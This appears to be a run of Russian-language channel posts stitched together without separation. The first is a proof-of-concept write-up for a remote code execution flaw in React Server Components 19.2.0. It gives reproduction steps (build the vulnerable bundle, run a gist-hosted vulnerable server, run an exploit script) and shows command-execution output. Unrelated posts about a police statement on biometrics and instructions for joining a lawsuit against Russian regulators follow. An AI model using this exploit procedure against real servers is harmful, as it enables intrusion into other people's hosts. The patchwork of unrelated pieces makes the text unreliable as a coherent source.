React RCE: пруф с нуля, без «заведомо уязвимых серверов»

какой-то ясновидящий в комментах заявил, что poc крутится «на специально дырявом сервере» и вообще «это не по-настоящему».
я пошёл, потратил два часа, собрал всё с чистого react — и вот результат:

rce воспроизводится на react 19.2.0, без патчей и плясок с бубном.
ниже полностью воспроизводимый сценарий.

1) клонируем и фиксируемся на уязвимой версии

git clone https://github.com/facebook/react.git
cd react
git checkout v19.2.0

2) ставим зависимости и собираем react-server-dom-webpack

yarn install
yarn build react-server-dom-webpack

уязвимый бандл после сборки:

build/oss-stable/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js

3) минимальный уязвимый сервер poc-server.js

кладём файл CVE-2025-55182_vuln_server.js в корень репо react:

https://gist.github.com/ghe770mvp/ebd40f33ec4ed080e603fda3ec20734e

4) стартуем уязвимый сервер

в коде я использую упрощённый сервер: напрямую подключаю react-server-dom-webpack, руками собираю serverManifest с нужным гаджетом (vm.runInThisContext) и показываю, что одним HTTP-запросом через decodeAction можно выполнить произвольный код.
это минимальный пример на уровне библиотеки. в реальных фреймворках  манифест генерируется автоматически и содержит ваши use server функции, там надо дальше искать реальные гаджеты и смотреть, что именно доступно через manifest.

node --conditions react-server --conditions webpack CVE-2025-55182_vuln_server.js

видим:

vuln server on http://localhost:3002

5) стреляем уже готовым эксплойтом

🔫🤬🔫

node exploit-rce-v4.js

ожидаемый вывод (пример для windows):

Test 2: vm.runInThisContext with require
RCE attempt: {"success":true,"result":"<computer_name>\\<user>\r\n"}

это прямой результат child_process.execSync("whoami"), выполненный через decodeAction из уязвимого бандла 19.2.0.

почему это НЕ «заведомо дырявый сервер»

- версия: четкий git checkout v19.2.0, без правок исходников и без патчей;

- бандл: берём как есть из build/oss-stable/...react-server-dom-webpack-server.node.development.js, собранный yarn build react-server-dom-webpack;

- манифест: даём vm.runInThisContext, и при отсутствии hasOwnProperty-проверки payload через $ACTION_* проламывает код.


итог простой:
react rsc rce — это не теоретическая страшилка, а реальный шелл на хосте из POST запроса.


хочешь спорить — сначала повтори шаги, потом уже пиши свое «экспертное» мнение. будет мне уроком тоже :)

👾

Разблокировка устройства с помощью распознавания лица или отпечатка пальца позволяет не сохранять фото пользователя или изображение отпечатка, а создавать специальный математический шаблон, который хранится в зашифрованном виде

А теперь, не переходя по ссылке попробуйте угадать, кто автор этого заявления: о котором написали РИА Новости. 9to5mac? Appleinsider? Wylsacom? Да не - не может быть, чтобы Эльдар Муртазин! Ладно - это управление по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД РФ. Есть идеи почему вдруг такая лояльность к биометрии? 🧐

Подготовили инструкцию, как присоединиться к иску против РКН и Минцифры:

➡️ Этап 1:

Для присоединения к иску потребуются 2 документа в формате pdf:

🔵 Заявление о присоединении к требованиям;
🔵 Подтверждение отправки копии заявления участникам дела.

(Так же можно сделать скан заявления без распечатки документов)

➡️ Этап 1.2:

Направление копии заявления ответчикам:

🔵 Самый простой способ направить копию заявления ответчикам — по электронной почте: rsoc_in@rkn.gov.ru, office@digital.gov.ru (на каждый из адресов эл. почты)
🔵Тема письма:

Заявление о присоединении к коллективному иску по делу № 02а-0857/2025 (Таганский районный суд г. Москвы)

🔵 Сопроводительное письмо свободного содержания, например:

Добрый день!

Направляю копию заявления о присоединении к коллективному иску по делу № 02а-0857/2025, рассматриваемому Таганским районным судом г. Москвы.
Прошу подтвердить получение письма.

С уважением,
Иванов В.В.

🔵 После отправки письмо нужно сохранить в pdf
(распечатать (ctrl+P) > сохранить как pdf.

(Также можно отправить копию заявления обычной почтой (заказным письмом), и тогда подтверждением отправки будет скан чеков об отправке)


➡️ Этап 2:

Подача документов в суд в электронной форме:

🔵 Перед подачей у вас должно быть готово 2 файла в формате PDF:
- Заявление о присоединении к иску;
- Подтверждение отправки копии заявления.
🔵 Зайдите на сайт Таганского районного суда:
https://mos-gorsud.ru/rs/taganskij
🔵 Авторизуйтесь в личном кабинете через Госуслуги.
🔵 После авторизации в меню личного кабинета выберите раздел «Подача процессуальных документов в электронном виде», далее выберете «Подать документ».
🔵 В открывшейся форме выбирайте Таганский районный суд, административное производство, личное обращение.
🔵 Поставьте галочку в поле про СМС-уведомления
🔵 Далее выберите «Подача документа по существующему делу», тип документа – ходатайство (заявление), номер дела 02а-0857/2025.
🔵 В первом поле загрузите скан заявления о присоединении в формате pdf, укажите количество страниц.
🔵 В разделе «Приложения к заявлению» прикрепите подтверждение отправки копии участникам дела, укажите количество страниц.
🔵 Квитанцию об оплате госпошлины прикладывать не нужно (она оплачена при подаче иска). Также не нужно ставить галочку об освобождении от оплаты.
🔵 После заполнения всех данных нажмите «Подать документ».

➡️ Этап 3

🔵После отправки документов пришлите письмо @konstantin_lar с указанием ФИО и даты подачи. Так мы сможем понимать, сколько человек присоединилось к иску.

📍 Подробная инструкция с картинками: ЗДЕСЬ
📍 Скачать заявление о присоединении к иску: ЗДЕСЬ
📍 Последняя версия иска: ЗДЕСЬ

Присоединяйтесь к иску против блокировок и цензуры.